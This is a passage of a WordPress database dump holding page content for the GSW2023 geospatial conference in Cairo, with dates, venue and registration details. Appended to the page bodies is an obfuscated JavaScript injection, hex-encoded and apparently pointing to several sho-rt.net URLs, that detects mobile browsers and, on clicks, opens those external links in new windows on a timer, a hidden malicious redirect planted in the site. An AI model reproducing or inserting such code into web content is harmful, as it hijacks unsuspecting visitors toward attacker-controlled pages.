|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-11-11 19:14:36','2022-11-11 19:14:36','',2856,'https://gsw2023.com/?p=3307',0,'revision','',0),
(3308,1,'2022-11-11 20:35:00','2022-11-11 20:35:00','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 